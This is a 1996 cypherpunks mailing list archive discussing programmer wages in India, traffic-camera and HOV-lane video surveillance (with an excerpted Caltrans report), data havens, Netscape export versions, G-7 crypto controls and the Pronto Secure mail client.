>>> It is extremely comforting to me -- I don't know about you -- to think that GM will maintain a control center able to communicate with my auto electronics.  Shit, why not TRW?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Thu, 15 Aug 1996 05:33:08 +0800
To: "James A. Donald" <cypherpunks@toad.com>
Subject: re: National Socio-Economic Security Need for Encryption    Technology
Message-ID: <1.5.4.32.19960814164931.0033e60c@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 08:49 14/08/96 -0700, James A. Donald wrote:
>At 07:00 PM 8/14/96 +0600, Arun Mehta wrote:
>> Whoa! In economies that are highly de-coupled, incomes and prices
>> can easily find quite different equilibria.
>
>So?  What does this have to do with the price of fish?

I was trying to explain how incomes and prices happened to be
lower in India, which is the reason why companies like Informix
like to hire Indian engineers.

>The fact is a company like Informix has a campus in India, and
>it has campuses in the US that are largely staffed by Indian teams,
>and it will pay big bucks to get its people out of India, even
>though it has to pay them more than ten times as much in the US.

I imagine (not knowing why Informix does what it does) that the
reason might have something to do with:

1) Bringing the programmer closer to the customer, to understand
the problem better, or to commission the software, debug it under
working conditions, whatever
2) If a team in the US is working on the project as well,
sometimes it helps to have the entire team physically proximate.
3) With team members far away, you may have concerns about
security of confidential information.

I could think of another reason or two.

>
>An Indian programmer doing the same job for the same company is
>more than ten times as valuable to that company if he is not 
>subject to the power of the Indian government, as proven by that
>companies actions.

Could you please be more precise? In what way does the "power of
the Indian government" intrude? You use the term "proven" rather
loosely... there could be other explanations for the company
wanting to move its employees around.

>
>Plainly Informix does not like the power of the Indian government,
>which is no surprise as a few years ago just about every company on
>earth utterly detested the power of the Indian government and would
>not touch the place with a ten foot pole.

Huh? Yes, we do have a bureaucratic state, which is infuriating,
and not just to the companies, but we've always had lots of
companies happy to be here. This is a big market, and a nice
place to live (and not just the natives say so).

>Under democracy, people get the government they deserve and 
>get it good and hard.

True -- democracy is a learning process, and the lessons
sometimes come hard. I don't know of any other way to learn.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 15 Aug 1996 17:28:29 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: re: National Socio-Economic Security Need for Encryption    Technology
Message-ID: <199608150606.XAA13751@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>At 08:33 13/08/96 -0700, James A. Donald wrote:
>> > Demand for Indian programmers is less than supply not because capital
>> > has somehow failed to flow to India, but because an engineer in India
>> > is not free to produce the value that engineers elsewhere are free
>> > to produce.

I've worked with companies that bring Indian contract programmers
to Silicon Valley and also contract for work back home in Bangalore.
Sure, part of the lower price paid for programmers in India vs. importing
the same people here is probably because the government is annoying.

Why is it worth paying nearly-American-scale wages to have them
do the work here rather than 1/5 as much back home?

Part of it is because it's harder to interact with people halfway around
the world, even using email and faxes, so the jobs that succeed well
in that environment are big jobs with well-defined inputs and outputs.
For work that needs real interaction between the customer and the worker,
it helps to have the worker nearby, so it's worth paying them to come here.
For work that needs interaction between workers and machines, especially
brand-new-not-yet-working machines on high-speed networks that aren't
easy or cheap to drag across the Pacific and then connect to India,
you need bodies on site.  Even for standard equipment you can buy
more of, it's still more productive to work here where you have lots of it
and can get spare parts at Fry's than to ship some of it to India and 
have people use it there.

Also, of course, the folks who are good enough to ship halfway around the 
world to do a job for you are usually the best they've got;
they'd get more than the average programmer back in Bangalore as well.



#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Thu, 15 Aug 1996 05:52:54 +0800
To: cypherpunks@toad.com
Subject: Re: India, Productivity, and Tropical Climes
Message-ID: <1.5.4.32.19960814170747.002b9dcc@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 18:59 13/08/96 -0700, Timothy C. May wrote:

>that virtually none of the countries which the most vocal critics are from
>have anything approaching the U.S. policy about immigration!

You are right -- India's immigration policy is lousy too.
However, this is an anachronism in increasingly globalizing economies.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 15 Aug 1996 17:14:19 +0800
To: The Prisoner <cypherpunks@toad.com
Subject: Re: forget photographing license plates!
Message-ID: <v02120d12ae386fdb853a@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:43 8/14/96, The Prisoner wrote:

>>>> It is extremely comforting to me -- I don't know about you -- to think
>>>>that GM will maintain a control center able to communicate with my auto
>>>>electronics.  Shit, why not TRW?

Hacker's delight.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 15 Aug 1996 17:21:51 +0800
To: Checkered Daemon <bdolan@use.usit.net (Brad Dolan)
Subject: Re: RANT re: National Socio-Economic Security Need for Encryption
Message-ID: <199608150629.XAA03193@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain



Brad Dolan asks:
> > 1. Good jobs of the future are knowledge jobs which require little 
> > capital investment.

At 06:24 PM 8/13/96 -0700, Checkered Daemon wrote:
> a)  Knowledge jobs require tremendous capital investment, as in degrees,
> training, continual updating of skills, etc.

But they do not require much capital investment by the boss.  That is 
to say the key corporate assets are increasingly owned by the employees,

At some point one would expect this to lead to a change in business 
structure, but I see no signs of this happening.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <vagab0nd@sd.cybernex.net>
Date: Thu, 15 Aug 1996 15:36:53 +0800
To: cypherpunks@toad.com
Subject: Re: photographed license plates
Message-ID: <2.2.32.19960815043853.007242e8@mail.sd.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:51 PM 8/10/96 -0400, you wrote:
>In the UK they now use cameras to deter speeding; the cameras are 
>triggered by vehicles passing by which exceed the speed-limit, so in 
>theory it's only naughty people who get photographed. Interestingly 
>enough, there are far more places with camera warning signs than there 
>are actual cameras; the actual cameras are moved around at random. Even 
>though most of the time there isn't a camera there, almost everbody 
>seemed to slow down in the marked areas; probably because there's almost 
>100% chance of being caught if there is a camera there.

I speed a lot, but I wouldn't mind seeing an automated system
!!! AS LONG AS TAXES THAT PAY SPEED COPS' SALARIES GO DOWN !!!
This system would free up the police force's time so greatly
that they would have time to make our neigborhoods safe. hehe
Vagab0nd<br>
<a href="http://ww2.sd.cybernex.net/~vagab0nd/index.html">Visit web page for
public key.</a>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Prisoner <null@void.com>
Date: Thu, 15 Aug 1996 19:02:49 +0800
To: cypherpunks@toad.com
Subject: Last word: auto video surveillance report[long]
Message-ID: <3212CCB0.27EA@void.com>
MIME-Version: 1.0
Content-Type: text/plain


I know this is pushing it as far as crypto-relevance.  I won't bring up 
the subject again. But this was too much to not pass along - there are 
some interesting insights into the mindset at work, and if I had to 
justify the cryptorelevance it would be by promoting the value of 
knowing the mind of Brother ... both Little and Big.


For those not familiar with Calif. bureaucratese: "HOV" is "High 
Occupancy Vehicle" and an "HOV Lane" is a carpool lane.
Edited doc. follows (from http://www.bts.gov/smart/cat/274.html):


                 Use of Videotape in HOV Lane Surveillance and 
Enforcement: Final Report

                                 USE OF VIDEOTAPE
                                        IN
                                     HOV LANE
                           SURVEILLANCE AND ENFORCEMENT
                                   FINAL REPORT
                                         
                  By John W. Billheimer Ken Kaylor Charles Shade
                                         
                                         
                                   Submitted to
                                         
                                State of California
                           Department of Transportation
                                         
                              under Contract 55 G710
                                         
                                         
                                       D232
                                    March 1990
                                         
                                         
               SYSTAN,INC.              in               ATD,INC.
            343 Second Street       Association   6431 Independence 
Avenue
               P.O. Box U              with      Woodland Hills, CA 
91367
           Los Altos, CA 94023



                           PREFACE AND ACKNOWLEDGEMENTS

        This report covers a six-month study designed to explore the use 
of
     vidoetape in HOV lane surveillance and enforcement.  The study is 
an
     extension of an earlier investigation of the effects of different
     enforcement strategies and engineering designs on violation rates 
on
     California's mainline HOV lanes.

        The report has been prepared in the Los Altos, California 
offices
     of SYSTAN, Inc. under Contract No. 55 G71 0 with the California
     Department of Transportation (CALTRANS).  The project was jointly
     sponsored by the California Highway Patrol (CHP).  Mr. Philip Jang,
     Chief of the HOV Systems Branch of CALTRANS Division of Traffic
     Operations served as project administrator, while Scott McGowen of
     CALTRANS acted as the project's technical monitor.
...
     SYSTAN wishes to thank all those who provided information and 
insights
     on the enforcement and operation of California's mainline HOV 
lanes,
     and acknowledges full responsibility for the analysis, 
interpretation,
     and presentation of the data they provided.

...
 
     1.1.1 Background

 ...
        It has been suggested that using video equipment to assist in 
HOV
     lane enforcement could reduce the requirements for patrol officers,
     increase citation rates, and minimize freeway disruption.  The 
current
     investigation has been designed to extend past studies of HOV lane
     enforcement by testing both the feasibility and accuracy of the use 
of
     video equipment in HOV lane surveillance.

     1.1.2 Objective

        The objective of the current study has been to demonstrate and 
test
     the use of video equipment in determining vehicle occupancy,
     documenting violator identity, and aiding enforcement of HOV lanes.
...
        Field tests showed that it is technologically possible to record
     several accurate views of vehicles traveling in mainline HOV lanes. 
     Specifications and costs of the equipment needed for videotape
     surveillance are summarized below.

        Cameras.  Best results are obtained with high speed color 
cameras
     capable of achieving exposure times of 1/1000 of a second.  A 14:1
     zoom lens is needed to focus on oncoming vehicles at distances of
     approximately 1200 feet.  Cameras placed at eye-level on the 
freeway
     itself should be small and unobtrusive.

        Auxiliary Equipment.  Two monitors with split screen capability 
are
     required in the control van.  One monitor provides an on-line 
review
     capability, while the other provides a permanent record of all 
camera
     views.  A special effects generator should be used to make the 
exact
     time and location a permanent part of the videotape record.

        Polarizing filters help to solve problems with glare from shiny
     cars and windshields, although they reduce the light-gathering
     capability of the cameras.  Infra-red cameras and light sources can 
be
     used to document license plates after dark by videotaping the rear
     license plates of departing cars.  However, it does not appear
     feasible to videotape oncoming vehicles under conditions of 
darkness
     or low visibility.  Results are not clear and the infra-red light
     source can distract oncoming drivers.
...
   1.3.3 Potential Applications

        Although it is technologically possible to record a series of
     accurate views of vehicles traveling in mainline HOV lanes, no
     combination of recorded views currently provides enough information 
to
     support prosecution for occupancy violators.  Even so, videotape
     surveillance of HOV lanes can provide useful information for a 
variety
     of other purposes.  These include:

        1. Support for on-line enforcement.  In cases where there are no
           refuge areas adjacent to mainline HOV lanes, videotape
           surveillance provides a means of alerting officers stationed
           downstream from the cameras to the presence of oncoming
           violators.

        2. Support for remote ticketing . Although videotape by itself 
does
           not appear to be accurate enough to provide a basis for
           citations, the combination of videotape and an observing 
officer
           could conceivably provide the accuracy needed for a system of
           mailed warnings and citations.  If a system of mailed 
warnings
           or citations can be installed, the officer would not have to 
pursue
           violators, and a videotape record of driver, occupancy, and
           license plate would be available for court hearings.  Such a
           system would be more cost-effective than the current system 
of
           freeway pursuit and roadside citing, and will reduce the
           congestion caused by rubbernecking.

        3. Performance Monitoring.  There are several applications in 
which
           videotape surveillance appears to provide a marked 
improvement
           over current practice.  These include:

           (a)   Freeway monitoring to document vehicle type and 
occupancy
                 over time;
		 
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  ...
        The cost of videotaping HOV lane activity is more than double 
the
        cost of monitoring operations manually.  However, videotape
        provides more accurate records, a consistent data base, and a
        permanent, verifiable record of traffic activity.  It also 
provides
        information on the vehicle mix, traffic speed, and the license
        plates of carpoolers and suspected violators.


     1.3.4 Public Reaction

        In a state in which radar cannot legally be used to enforce 
speed
     laws on state freeways, videotape surveillance of HOV lanes has
     significant legislative and public relations implications.  These
     implications are beyond the scope of the current study.  However, 
two
     pieces of information related to the current study may shed some 
light
     on the potential reactions of the public and the media to the
     possibility of videotape surveillance.

  ....
      Press Coverage.  The field tests undertaken during the current
     study attracted the attention of the Los Angeles media and resulted 
in
     a limited amount of press coverage.  Articles in the Los Angeles 
Times
     and Ontario Daily Report/Progress Bulletin were both balanced and
     informative.  To the extent that these stories can be viewed as an
     indication of press and public reaction to the use of videotape in 
HOV
     lane enforcement, there was no suggestion that CALTRANS and the CHP
     would be exposed to a massive public outcry if videotape proves to 
be
     technologically and legally feasible as an enforcement tool. 
     Furthermore, it can be assumed that the articles themselves made
     potential HOV lane violators in the Los Angeles area more cautious.
     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

...
        Video cameras operating in conjunction with officer observation 
may
     provide sufficient accuracy to support mail-out citations for HOV 
lane
     occupancy violations.  An officer stationed downstream from the 
video
     cameras is in a position to verify the occupancy of vehicles which
     appear suspect to observers monitoring camera output.  ...

     Moreover, the presence of an observing officer
     may remove some of the "Big Brother is watching" stigma from the 
use
     of videotape.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 15 Aug 1996 18:25:56 +0800
To: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Subject: Re: Anguilla - A DataHaven?
Message-ID: <199608150736.AAA15028@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:15 AM 8/15/96 +0600, you wrote:
>At 10:27 14/08/96 -0700, Timothy C. May wrote:
>>* the role of physical vs. cyberspace data havens
>...
>>3. Vince seems to be a in a somewhat precarious position, awaiting renewal
>>of a one-year work permit.
>
>I'm sure this has come up before, but what would prevent a server
>being located on a buoy or something at sea outside territorial
>limits (or when satellites become cheaper, on a satellite itself)
>offering such services? 

Piracy.  Some pirates may have black Jolly Roger flags on their ships,
but most have flags that say "Coast Guard" or "Navy" or "Harbor Police",
and think they're protecting their National Security or something.
Satellite launching is generally somewhat government-controlled,
though you could get a remailer into space if you didn't tell the
government too much about it until it was launched.
The US apparently has restrictions on crypto capabilities of
satellites launched from the US, according to something I read on the
net once.  But I suppose you could launch a programmable satellite,
and then reprogram it by radio....

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 15 Aug 1996 18:26:52 +0800
To: cypherpunks@toad.com
Subject: Re: Anguilla - A DataHaven?
Message-ID: <199608150803.BAA15281@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:27 AM 8/14/96 -0700, Tim wrote:
>* the role of physical vs. cyberspace data havens
.....
> so I tended to view data havens as not being tied to physical communities
> where the local potentates could revoke work permits, visas, 
> travel permits, business licenses, etc.

Agreed.  At least for now, banking havens are a different kind
of market than data havens - people want to be able to demonstrate
that activities are being run from Non-Taxing states, though there's
a parallel need for private data communications to hide any 
connections back to a potentially more greedy state,
and perhaps to move money back home as well.

Data havens, on the other hand, may need public ports in tolerant
locations, but most of their business really needs to be
encrypted any way; the visible parts such as web pages
are only a small part of the game.  I suspect that, rather than
having fixed physical locations, they probably need to operate on a
Temporary Autonomous Zone basis, moving elsewhere when a jurisdiction
becomes unfriendly but mostly trying to avoid too much notice.

>What the form of these "cyberspace data havens" might take is unclear.
>Several pieces of technology are missing, just as they were missing four
>years ago when one of the early list members contacted me to tell me how
>easy it would be to set up a data haven with computers. (It wasn't easy
>then, and it ain't easy now. The pieces that are missing are the
>reifications of protocols we talk about a lot....mere encryption and
>authentication are only the starting points, and look at how hard it's been
>just to get _them_ deployed.)

Reification is one thing; developing business models and markets
is another, and making the activities visible so potential users can
_find_ data havens is a third.  There are some activities that
operate as temporary data havens today - child pornography, warez, 
police Red Squad and blackmail files on citizens kept illegally on home
machines outside the public's control, and other unsavory groups that limit
the people who know about them.  Public data havens are a bit different.
Finding a reason to Just Do It means you either need a real threat model
or you end up becoming Yet Another Spam Server like many of the
remailers have been.  

Some things we need to implement Data Havens - 
1 - digicash or equivalent - it's coming, but it's not widely used,
and if you can't pay anonymously it's tough to pay for data havening
anonymously.
2 - practical temporary registration of connections - is hacking
a DNS server enough?  Or do we need IRC meetmes?  Not sure.




#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 15 Aug 1996 20:18:14 +0800
To: Rich Graves <rich@c2.org>
Subject: Re: Netscape US betas lagging...
In-Reply-To: <Pine.GUL.3.95.960812003508.23548E-100000@Networking.Stanford.EDU>
Message-ID: <3212EBFA.2B5D@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves wrote:
> The international version is 3.0b7. The export-controlled version on wwwus
> is two revisions and almost a month behind at 3.0b5. Have y'all simply not
> had time/inclination to recompile the 128-bit version with the latest
> patches, or is there some sort of trouble brewing?

  There is no trouble brewing.  The final release of 3.0 will be
happening shortly.  The final US version without expiration will
be made available from our US download site.  Our process for
updating the US download site has not been passed over to our
release group, so it still has to be done by engineering.  We
have been concentrating on getting the release out, and didn't
think that it was crucial to get the last few betas out for US
download.  In the future this will be handled by our release
group as part of their automated process, and so you won't see
this lag in the future.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Thu, 15 Aug 1996 11:14:00 +0800
To: "'cypherpunks@toad.com>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB8A50.F3A1BAE0@groningen08.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:

>I've just had an insight with regard to Bart's ongoing capital 
debate.  In response to Perry's "green pylon" post, Bart wrote:

> I am saying that the fact that American workers are better paid
> than workers in Third World countries, can be explained for a
> large part by the fact that there is much more capital invested
> in the US than in Third World countries.

Bart's error lies in his confusion of the terms "captial" and
"capital investment."  While capital may be used to make capital
investments, there are other things it can be spent for as well
(wages, taxes, supplies, etc.).  

If Bart were to use the term "infrastructure" then it would be
clear that the ebb and flow of mere capital would have relatively
little to do with infrastructure influenced wages.<  

What does 'capital' mean? The MacMillan dictionary of modern 
economics (3d edition, p. 51) says:

1) A word used to refer to a factor of production produced by the 
economic system. Capital goods are produced goods which are used as 
factor INPUTS for further PRODUCTION. As such capital can be 
distinguished from LAND and LABOUR which are not conventionally 
thought of as being themselves produced by the economic system. As a 
consequence of its heterogenous nature, the measurement of capital has 
become the source of much controversy

2) The word is also used as a term for financial ASSETS.


So, I fear that it's Sandy who is confused about the meaning of the word 
'capital', not me.

But even if it is me who is confused about the meaning of the word 
'capital' (which isn't the case), this confusion wouldn't affect my argument 
at all. If American capital is invested in foreign countries instead of in the 
US, then the total amount of capital invested in the US will be lower than 
it would have been if the capital had been invested in the US. So the 
wages in the US would be lower than they would have been if the capital 
had been invested in the US. The argument is still the same, and my 
question is still not answered.


Bart Croughs







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soldier <soldier@phunc.com>
Date: Thu, 15 Aug 1996 22:13:30 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: forget photographing license plates!
In-Reply-To: <v02120d12ae386fdb853a@[192.0.2.1]>
Message-ID: <Pine.LNX.3.91.960815030333.9859A-100000@phunc.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 14 Aug 1996, Lucky Green wrote:

> At 22:43 8/14/96, The Prisoner wrote:
> 
> >>>> It is extremely comforting to me -- I don't know about you -- to think
> >>>>that GM will maintain a control center able to communicate with my auto
> >>>>electronics.  Shit, why not TRW?
> 
> Hacker's delight.
> 
no kidding.. it wouldn't be hard to have something to capture the signal 
to open the car doors and start the engine.  
anyhow i wouldn't trust anything to be controled by a radio freq. 
anyhow.. it never works.. for example the garage door openers (pardon my 
spelling) people are robbing houses by duplicating the garage door opener 
signal.

-soldier




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 16 Aug 1996 00:57:00 +0800
To: "The Prisoner (tm)" <void@null.net>
Subject: Re: Crypto Ban Talk @ G-7
In-Reply-To: <32120058.66B2@null.net>
Message-ID: <Pine.SUN.3.91.960815062740.24562C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I have the text of the resolution passed by G-7 and Russia that moves
towards greater controls on crypto at: 
  http://www.eff.org/~declan/global/

-Declan


On Wed, 14 Aug 1996, The Prisoner (tm) wrote:

> Well, even tho Tim's language was hypothetical here's this item.  Was 
> some of this on the cpunks and I missed it?  Very possible, & if so, 
> sorry.
> 
> ===============================================[quote:]=================
> 
> 
> In article <X6k0RD1w165w@tanda.on.ca>, marc@tanda.on.ca (Marc Thibault) 
> wrote:
> 
> >     I picked up a rumor that the G-7 has endorsed a resolution calling
> >     for international cooperation to control private encryption. Does
> >     anybody have solid information?
> >
> 
> They've been discussing it. The US and some others want it. The Japanese
> and one other country won't go along. So far, talk but no action. Stay
> tuned.
> 
> David [Sternlight that is  ....]
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 16 Aug 1996 01:46:06 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Schlafly on crypto
In-Reply-To: <Pine.SUN.3.91.960814093658.5845D-100000@crl14.crl.com>
Message-ID: <Pine.SUN.3.91.960815065257.25638A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Take a look at the Boston Coalition for Freedom of Expression's list of 
enemies of free expression. Excerpt follows.

-Declan

---

Linkname: Phyllis Schlafly, Eagle Forum
Filename: http://www.eff.org/pub/Groups/BCFE/bcfenatl.html#Schlafly

   Phyllis Schlafly
   President          
   Eagle Forum    
   Box 618                     
   Alton, IL 62002
                            
   618/462-5415  
  
   "Leading the pro-family movement to victories since 1972." Basic
   membership includes a subscription to The Phyllis Schlafly Report and
   costs $15.00. Mrs. Schlafly, whose husband Fred used to head the World
   Anti-Communist League, is the person considered most responsible for
   the defeat of the ERA. Her book A Choice Not an Echo, published in
   1964 to support the presidential aspirations of Barry Goldwater, is
   one of the seminal texts of contemporary American conservative
   politics.




On Wed, 14 Aug 1996, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On Wed, 14 Aug 1996, Jim Legg wrote:
> 
> > Beware when politicos speak!
> 
> Good advice, but...
>  
> > Phyllis Schlafly would think nothing of trying to ban speech on
> > the internet when it is something that she doesn't agree with.
> 
> An interesting allegation.  I wonder if it is merely rhetoric or
> if Jim has any evidence to backup this statement?
> 
> Does Jim know who Phyllis' son is?
> 
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Fri, 16 Aug 1996 01:42:38 +0800
To: cypherpunks@toad.com
Subject: Re: GOP security
Message-ID: <199608151407.HAA10014@well.com>
MIME-Version: 1.0
Content-Type: text/plain




> Authorities in Chicago, where the Democrats will meet the last
>week of August, are taking similar precautions. Metal detectors,
>bomb-sniffing dogs and surveillance cameras will be in force,
>along with thousands of police. Coast Guard cutters will patrol
>Lake Michigan. Chicago police are sealing an eight-block area
>around the United Center sports arena, the main convention site,
>to all unauthorized cars, trucks and pedestrians.  As the 20th
>century nears an end, wary, pervasive security is as much a part
>of the convention scene as Old Glory and silly hats. San Diego has
>been preparing convention security for more than a year. Then a
>bomber on the other side of the country suddenly made everyone
>wonder if the next big public event could be free of mayhem and
>terror.


Taxicabs will have unrestricted access of course and are therefore
the vector of choice.

I heard an interesting ahem, "rumor" related to security through
obscurity- only 2/5 of a major armored car companys trucks are
actually armored/bullet resistant glass, the other three are just
look-alikes...... saving money.....tsk,tsk.

Brian

"Zazen? Well it beats sitting around on your ass all day doing
nothing."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Thu, 15 Aug 1996 23:22:22 +0800
To: geoff@commtouch.co.il
Subject: Re: Fw: Re: Free Pronto Secure Offer
Message-ID: <199608151142.HAA03273@booz.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: geoff@commtouch.co.il, cypherpunks@toad.com
Date: Thu Aug 15 07:45:59 1996
Nicely Put !!  I. for one, love it... warts ( for now ) and all !

To: unicorn@schloss.li, cypherpunks@toad.com
Date: Thu Aug 15 10:53:53 1996
On 14 Aug unicorn wrote:

> "Do all the work I should be doing or have done in the first place
> discover the critical flaws in my new-keen-o-ka-jive-o crypto system
> and I will give you a free copy of a critically flawed crypto system
> (a $99.00 value) ABSOLUTELY FREE.  Wait, don't order yet.  Included
> you also get to> actually whitewash my fence and then mow my lawn.
> All at NO COST to you."

Unicorn, please try to take a minute to think before hitting that send
key.

You infer that a product is critically flawed without even trying it ?
There are quite a few members of this list who are using Pronto Secure
and will testify to the contrary.
See http://www.commtouch.com/testers.htm for a list of people who take
the trouble to try out a product before venturing an opinion.

Agreed that feedback from external testers is a good deal for
developers. It is also not a bad deal for evaluators, they get a free
copy of a product which in the case of Pronto Secure many find useful
(as witnessed by x-mailer headers on c'punk traffic). Testers also get
an opportunity to contribute neat feature ideas which helps propagate
secure messaging to the masses.

Unicorn, you are invited to whitewash my fence :)


- ---------------------------------------------------------------
Geoff Klein, Pronto Secure Product Manager;   www.commtouch.com
My PGP public Key 1814AD45 can be obtained by sending a message
to geoff@commtouch.co.il with "Get PGP Key" as the subject.
- ----------------------------------------------------------------


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCXAwUBMhMN+eJ+JZd/Y4yVAQFQ1wQKA4D7OyVKQDyM93653ffUgG3iRUtMkYc6
ozcSRGz1RHlH2HdUWPuM7M9YGvF8hhcccPwWUA1G1NuJypeEsCwKKHuaEiTIpRVk
ZRAb1nA2AP/dLZ2NQTBxDr7JQMZ4zfSfX376Ejk7Ep1oR2XAr/fFP/QYHzpHsvme
FYPEzNtejjDQSg==
=/O/z
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 15 Aug 1996 23:52:36 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: Fw: Re: Free Pronto Secure Offer
In-Reply-To: <Pine.SUN.3.94.960814221834.28297A-100000@polaris>
Message-ID: <199608151351.IAA16343@homeport.org>
MIME-Version: 1.0
Content-Type: text


Black Unicorn wrote:

| > The offer is still on. A free copy of Pronto Secure in exchange for 
| > feedback. Open to anyone on the c'punk list.
| 
| "Do all the work I should be doing or have done in the first place
| discover the critical flaws in my new-keen-o-ka-jive-o crypto system and I
| will give you a free copy of a critically flawed crypto system (a $99.00
| value) ABSOLUTELY FREE.  Wait, don't order yet.  Included you also get to
| actually whitewash my fence and then mow my lawn.  All at NO COST to you."

	Does the fence painting include plane tickets? :)

	I've been playing with Pronto, and it seems to be pretty darn
good.  I stopped using Eudora, since pronto offers the features I
want.  (Except procmail.  Hey Geoff, how about procmail support?)  I
haven't, and probably won't, delve deep into its crypto features
beyond using them; my real keys I keep on a machine with per process
memory management and at least a semblance of security.

Adam

PS: When I say procmail, I mean procmail.  I've used a lot of mail
processors, and am really impressed by procmail.  You can slap a happy
windows front end on it, but make it available to your power users.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Fri, 16 Aug 1996 02:00:14 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: Crypto Ban Talk @ G-7
In-Reply-To: <Pine.SUN.3.91.960815062740.24562C-100000@eff.org>
Message-ID: <321333D4.2003@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh wrote:
> 
> I have the text of the resolution passed by G-7 and Russia that
> moves towards greater controls on crypto at:

I just have to wonder whether these people expect their measures to
really reduce terrorism, or if they simply expect to be able to
identify and imprison/kill all the terrorists so that terrorism can 
be eliminated like smallpox.

If the former, I'd say they're stupid, and if the latter, well, I'd
say they're stupid.

______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
       m5@tivoli.com * m101@io.com       *    
